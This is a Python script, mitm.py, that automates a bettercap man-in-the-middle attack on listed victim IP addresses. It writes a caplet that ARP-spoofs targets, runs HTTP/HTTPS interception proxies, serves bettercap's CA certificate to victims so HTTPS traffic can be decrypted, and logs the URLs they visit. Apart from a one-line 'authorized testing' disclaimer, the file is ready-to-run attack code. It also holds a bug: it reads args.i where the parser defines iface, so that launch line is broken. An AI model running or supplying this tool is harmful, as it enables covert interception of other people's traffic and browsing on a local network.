#!/usr/bin/env python3
"""
mitm.py — Automated bettercap MITM setup to capture victim URLs.

What it does:
  1. Generates the bettercap caplet automatically
  2. Prepares the CA serving directory (once bettercap creates the CA)
  3. Serves the CA over HTTP (port 9000) so victims can download it
  4. Launches bettercap with the caplet
  5. Tails the log file in a separate thread, filtered for URLs

Usage:
  sudo python3 mitm.py -i eth0 -t 192.168.31.67,192.168.31.103
  sudo python3 mitm.py -i wlan0 -t 192.168.31.67

Authorized security testing only.
"""

import argparse
import os
import re
import subprocess
import sys
import threading
import time
from pathlib import Path

# ---------- defaults ----------
CA_SERVE_DIR = Path("/root/ca-serve")
LOG_FILE     = Path("/root/victim-urls.log")
CAPLET_FILE  = Path("/root/mitm-urls.cap")
HTTP_PORT    = 9000

CAPLET_TEMPLATE = """\
# Auto-generated by mitm.py
set net.sniff.output {log}
set net.sniff.filter 'not multicast and not (udp port 5353)'

net.probe on
sleep 10

set arp.spoof.targets {targets}
set arp.spoof.internal true
set arp.spoof.fullduplex true
arp.spoof on

net.sniff on

set http.proxy.port 8080
http.proxy.on

set https.proxy.address 0.0.0.0
set https.proxy.port 8443
https.proxy.on

set http.server.address 0.0.0.0
set http.server.port {ca_port}
set http.server.path {ca_dir}
http.server.on
"""

URL_RE = re.compile(
    r"(https?\.proxy|net\.sniff\.(dns|https|http)).*", re.IGNORECASE
)


def check_root():
    if os.geteuid() != 0:
        sys.exit("[!] Run as root: sudo python3 mitm.py")


def check_bettercap():
    if subprocess.run(["which", "bettercap"], capture_output=True).returncode != 0:
        sys.exit("[!] bettercap not found. Install: sudo apt install bettercap")


def write_caplet(targets: str):
    CAPLET_FILE.write_text(
        CAPLET_TEMPLATE.format(log=LOG_FILE, targets=targets,
                               ca_port=HTTP_PORT, ca_dir=CA_SERVE_DIR)
    )
    print(f"[+] Caplet written: {CAPLET_FILE}")


def prep_ca():
    """Wait for bettercap CA, copy into serve dir."""
    CA_SERVE_DIR.mkdir(parents=True, exist_ok=True)
    print("[*] Waiting for bettercap to generate its CA...")
    candidates = [
        Path.home() / ".bettercap-ca.pem",
        Path("/root/.bettercap-ca.pem"),
    ]
    for _ in range(60):  # up to 60s
        for ca in candidates:
            if ca.exists():
                dest = CA_SERVE_DIR / "bettercap-ca.pem"
                dest.write_bytes(ca.read_bytes())
                (CA_SERVE_DIR / "bettercap-ca.crt").write_bytes(ca.read_bytes())
                print(f"[+] CA copied to {dest}")
                return dest
        time.sleep(1)
    print("[!] CA not found after 60s — continuing without it.")


def serve_ca():
    """Serve CA dir over HTTP in background thread."""
    def run():
        subprocess.run(
            ["python3", "-m", "http.server", str(HTTP_PORT)],
            cwd=CA_SERVE_DIR, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
        )
    t = threading.Thread(target=run, daemon=True)
    t.start()
    print(f"[+] CA server: http://<your-ip>:{HTTP_PORT}/bettercap-ca.pem")


def tail_log():
    """Live-tail the log, printing only URL-relevant lines."""
    print(f"[*] Tailing {LOG_FILE} (filtered) — Ctrl+C to stop\n")
    while not LOG_FILE.exists():
        time.sleep(1)
    with LOG_FILE.open() as f:
        f.seek(0, 2)  # seek to end
        while True:
            line = f.readline()
            if line and URL_RE.search(line):
                print(line.rstrip())
            elif not line:
                time.sleep(0.5)


def main():
    ap = argparse.ArgumentParser(description="bettercap MITM URL capture")
    ap.add_argument("-i", "--iface", required=True, help="interface (e.g. eth0)")
    ap.add_argument("-t", "--targets", required=True,
                    help="comma-separated victim IPs")
    args = ap.parse_args()

    check_root()
    check_bettercap()
    write_caplet(args.targets)

    print(f"""
[*] Setup:
    - Victims : {args.targets}
    - Log     : {LOG_FILE}
    - CA URL  : http://<your-ip>:{HTTP_PORT}/bettercap-ca.pem   (Android)
                http://<your-ip>:{HTTP_PORT}/bettercap-ca.crt   (Windows)

    Install the CA on victims AFTER bettercap starts.
""")

    # start log tailer in background
    threading.Thread(target=tail_log, daemon=True).start()

    # launch bettercap (blocking)
    try:
        subprocess.run(["bettercap", "-iface", args.i,
                        "-caplet", str(CAPLET_FILE)])
    except KeyboardInterrupt:
        print("\n[*] Stopping...")
    finally:
        print(f"[*] Full log saved: {LOG_FILE}")
        print("[*] Filtered view: grep -E 'https?.proxy|dns' " + str(LOG_FILE))


if __name__ == "__main__":
    main()
